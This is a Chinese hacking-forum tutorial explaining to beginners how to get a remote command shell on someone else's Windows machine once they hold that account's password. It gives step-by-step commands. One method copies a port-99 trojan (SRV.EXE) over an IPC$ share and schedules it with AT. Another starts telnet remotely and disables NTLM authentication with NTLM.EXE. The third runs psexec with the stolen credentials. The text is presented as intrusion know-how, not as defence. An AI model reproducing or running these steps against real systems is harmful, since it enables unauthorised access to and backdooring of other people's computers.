打开对方CMD的三种方法

为什么建立IPC$提升guest的权限，提的是我自己机子上的guest的权限啊？"

论坛里也看过不少这样的贴了,觉得应该说点什么.如果你真有兴趣学的话,就把

下面几种方法看完吧,如果你觉得一种方法都学不会,就劝你不要再幻想进步了!

利用用户建立了IPC连接,成功的话并不能直接在你的电脑上建立超级用户,

因为NET USER /ADD必须是在本地运行的,

也就是说,你必须想办法TELNET,或者用其他方法跳进对方的CMD里才能建立用

户.如何能利用用户打开对方的CMD呢?

前提:你已经拥有了用户和密码.

方法一

因为前面已经成功建立了IPC连接,所以我

们就可以复制命令把木马传送过去,例如上传SRV.EXE,COPY SRV.EXE //IP/C$

,然后用NET TIME //IP查看对方的时间,再用类似AT //IP SRV.EXE 06:10的命令

来运行SRV.EXE,不要告诉我SRV是开99端口的木马都不知道?!如果顺利SRV没被

杀毒软件KILL了的话,就可以在运行或着CMD里输入TELNET IP 99来登陆对方

CMD了.然后就可以在对方CMD里建立用户了,跟本地DOS操作一样``

方法二

利用NETSVC.EXE这个工具来打开对方的TELNET服务,

但是即使打开了TELNET,也要通过对方NTLM验证,还要把对方NTLM验证关掉,

常用的方法就是,上传流光里的NTLM.EXE,再用AT运行,就可以直接TELNET IP

而不用验证了.再者,也可以在本地建立一个与你用来进行IPC连接的密码和用户名

相同的用户,然后再重新启动用这个用户本地登陆,就可以直接TELNET了

方法三

这方法是最简单最容易而最有效的方法,如果你有耐性看到这里,就说明我的努力

没有白费了.之所以不把这种方法写在前面,是因为想菜鸟们能够多尝试其他的方

法,明白"通往电脑的路不止一条!"的道理.

先在网上下载一套叫PSTOOLS的工具包,PSTOOLS是一套用于winnt/win2000

的系统管理工具，打开压包后里面共有十二个命令,功能非常强大.这里我们要用

到的就是PSEXEC.EXE,具体功能就不说了,自己去看说明吧,使用格式如下

psexec.exe //ip -u 用户名 -p 密码 cmd.exe

这样就能直接打开对方CMD了,而且不用NTLM验证.

下面是PSTOOLS的下载地址,

http://download.pchome.net/system/sysenhance/16488.html

因为SRV.EXE和NTLM.EXE被很多杀毒软件认定为病毒了,多半会被杀掉.所以成功

率不高.对比下第三种方法是最实在的,相信也是看完本文后大家用的最多的方法,希望你能接受吧.也建议大家试试前面的两种方法,如果你有去尝试,你一定会

有收获的.

以上方法都是在网上跟前辈学来的,也算是自己一些小小的经验.但愿看完本文能

让你对打开对方CMD的认识能有所提升.